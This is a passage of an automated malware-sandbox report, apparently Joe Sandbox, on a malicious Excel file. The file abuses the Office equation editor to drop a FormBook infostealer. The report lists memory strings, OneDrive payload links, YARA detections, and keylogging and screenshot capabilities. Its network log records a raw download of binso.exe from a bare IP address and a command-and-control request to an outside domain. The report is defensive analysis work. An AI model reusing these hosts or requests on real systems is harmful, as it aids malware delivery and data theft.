Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: vbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912K
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/h
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic	HTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113

Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00433B64 GetKeyboardState,

4_2_00433B64

Contains functionality to record screenshots

Source: C:\Users\Public\vbc.exe

4_2_00425A40

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E966E8	0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E966F3	0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96340	0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96743	0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96753	0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E9CF01	0_2_02E9CF01
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044629C	4_2_0044629C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044B47C	4_2_0044B47C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044629C	7_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044B47C	7_2_0044B47C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044629C	10_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044B47C	10_2_0044B47C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02071238	12_2_02071238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCE0C6	12_2_01FCE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0201A37B	12_2_0201A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE905A	12_2_01FE905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020763BF	12_2_020763BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD3040	12_2_01FD3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FFD005	12_2_01FFD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF63DB	12_2_01FF63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCF3CF	12_2_01FCF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0204D06D	12_2_0204D06D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD7353	12_2_01FD7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD2305	12_2_01FD2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCE2E9	12_2_01FCE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205D13F	12_2_0205D13F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FEC5F0	12_2_01FEC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02072622	12_2_02072622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0201A634	12_2_0201A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD351F	12_2_01FD351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE1489	12_2_01FE1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205579A	12_2_0205579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020057C3	12_2_020057C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205443E	12_2_0205443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDC7BC	12_2_01FDC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0200D47D	12_2_0200D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02005485	12_2_02005485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDE6C1	12_2_01FDE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02016540	12_2_02016540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD4680	12_2_01FD4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020505E3	12_2_020505E3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE69FE	12_2_01FE69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD29B2	12_2_01FD29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02083A83	12_2_02083A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF286D	12_2_01FF286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDC85C	12_2_01FDC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0207CBA4	12_2_0207CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02056BCB	12_2_02056BCB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205DBDA	12_2_0205DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCFBD7	12_2_01FCFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0204F8C4	12_2_0204F8C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206F8EE	12_2_0206F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF7B00	12_2_01FF7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205394B	12_2_0205394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02055955	12_2_02055955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0207098E	12_2_0207098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02002E2F	12_2_02002E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDCD5B	12_2_01FDCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205BF14	12_2_0205BF14
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206CFB1	12_2_0206CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02042FDC	12_2_02042FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205AC5E	12_2_0205AC5E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FFDF7C	12_2_01FFDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE0F3F	12_2_01FE0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02000D3B	12_2_02000D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FEEE4C	12_2_01FEEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206FDDD	12_2_0206FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009D192	12_2_0009D192
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009B8C6	12_2_0009B8C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009C953	12_2_0009C953
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00088C7B	12_2_00088C7B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00088C80	12_2_00088C80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009BCA9	12_2_0009BCA9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082D87	12_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082D90	12_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009BDFF	12_2_0009BDFF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082FB0	12_2_00082FB0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F06	12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003932FF	12_2_003932FF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00393302	12_2_00393302
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00391362	12_2_00391362
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00391359	12_2_00391359
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003957B2	12_2_003957B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003908FB	12_2_003908FB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00390902	12_2_00390902
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00397D02	12_2_00397D02

PE file contains strange resources

Source: binso[1].exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Odhbljup.exe.4.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Yara signature match

Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
